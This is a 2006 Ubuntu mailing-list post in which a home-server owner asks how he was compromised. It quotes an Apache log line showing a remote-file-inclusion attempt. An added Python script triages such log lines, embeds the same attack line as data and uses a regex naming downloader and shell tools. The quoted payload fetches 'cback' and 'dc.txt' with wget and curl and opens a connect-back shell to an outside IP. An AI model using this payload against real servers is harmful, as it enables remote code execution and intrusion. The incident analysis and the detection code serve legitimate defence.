My home desktop was compromised, but how?
- From: "Carthik Sharma" <carthik@xxxxxxxxx>
- Date: Tue, 28 Feb 2006 15:44:21 -0500
Hi,
I run an Apache and SSH server on my home computer. I have not
installed any PHP scripts whatsoever. All there are are text files
and the odd HTML file.
Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ directory (like "agent.8213") which I cannot open; these are
setuid-ed -- how do I open these?
In my apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
That above is a valid URL, and will take you to a script to deface
someone's PHP script etc., I suppose. Now, how did this malicious
hacker get into my computer?
(The full line is:
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)" )
How would I go about tracing how this incident happened?
Any server/security admins here that can help me with a little
patience? I really want to get to the root of this and find out why
whatever happened happened.
None of the passwords for the ssh accounts are dictionary words, in
fact all are combinations of letters, numbers and sometimes special
symbols.
I have done nothing special to modify Apache or the SSH daemon; in
fact, sshd listens on port 8888.
I could paste logs here, but they would be too long. For now, I have
stopped the apache and ssh servers.
Any help will be most welcome. My security bubble just burst :(
Carthik.
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
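The request quoted in the post above has the shape of a remote file inclusion (a query parameter, mosConfig_absolute_path, set to a URL on a third-party host, followed by a cmd parameter carrying a shell one-liner). As an added example, not part of the original post or of any reply in the thread, the script below parses Apache combined-format access log lines, URL-decodes each query parameter, and flags two indicators: a parameter whose value is an absolute URL, and a decoded value that chains downloader or interpreter names with ; or | separators. It also reports the HTTP status, because the status decides whether the targeted script was actually served. The attack line is the post's own log entry reassembled onto one line; the second, benign line is constructed for contrast. The regular expressions and the field names are this example's own choices.

```python
"""Triage Apache access-log lines for remote-file-inclusion / command-injection attempts."""
import re
from urllib.parse import unquote_plus

# Apache "combined" log format, which is what the posted line uses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter whose decoded value is an absolute URL: the classic RFI shape.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# A decoded value that names a downloader/interpreter and chains it with ; or |.
SHELL_RE = re.compile(r'\b(?:wget|curl|chmod|perl|python|sh|bash|nc)\b.*[;|]', re.I)

# The log line quoted in the post, joined back onto one line.
ATTACK_LINE = (
    '192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content'
    '&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;'
    'chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;'
    'chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;'
    'curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;'
    './cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;'
    'chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" '
    '404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
)
# Constructed benign line for contrast (not from the post).
BENIGN_LINE = ('192.168.0.50 - - [26/Feb/2006:14:00:00 -0500] '
               '"GET /notes/todo.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"')


def parse_query(query):
    """Split on '&' only (never ';', which is part of the payload) and decode each side."""
    pairs = []
    for part in query.split('&'):
        key, _, value = part.partition('=')
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def analyze_line(line):
    """Return a triage record for one log line, or None if it is not combined format."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    params = parse_query(query) if query else []
    rfi_params = [k for k, v in params if REMOTE_URL_RE.match(v)]
    shell_payloads = [v for _, v in params if SHELL_RE.search(v)]
    return {
        'ip': m.group('ip'),
        'path': path,
        'status': int(m.group('status')),
        'rfi_params': rfi_params,
        'shell_payloads': shell_payloads,
        'suspicious': bool(rfi_params or shell_payloads),
    }


def verdict(rec):
    """One-line conclusion: a 404 means the targeted script is not on this host."""
    if not rec['suspicious']:
        return 'clean'
    if rec['status'] == 404:
        return 'attack attempt, target script absent (404): not the entry point'
    return 'attack attempt, script answered %d: inspect %s' % (rec['status'], rec['path'])


def scan(lines):
    """Return (verdict, record) for every parseable, suspicious line."""
    out = []
    for line in lines:
        rec = analyze_line(line)
        if rec and rec['suspicious']:
            out.append((verdict(rec), rec))
    return out


if __name__ == '__main__':
    for v, rec in scan([ATTACK_LINE, BENIGN_LINE]):
        print(rec['ip'], rec['path'], rec['status'], rec['rfi_params'], v)
        for payload in rec['shell_payloads']:
            print('  decoded payload:', payload)
```

Run against the posted line, the script reports mosConfig_absolute_path as the remote-URL parameter, prints the decoded cmd chain (wget/curl of cback and dc.txt, then a connect-back to 217.160.242.90:8081), and gives the verdict that the request got a 404: /index2.php does not exist on a host with no PHP scripts, so this particular request cannot be how the attacker got in, and the /tmp files have to be explained by some other entry point. Run it over the whole access log (for example, `scan(open('/var/log/apache2/access.log'))`) and look for suspicious hits with a 200 status.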
- Follow-Ups:
- Re: My home desktop was compromised, but how?
- From: Dennis Kaarsemaker
- Re: My home desktop was compromised, but how?
- From: Michael J. Lynch
- Re: My home desktop was compromised, but how?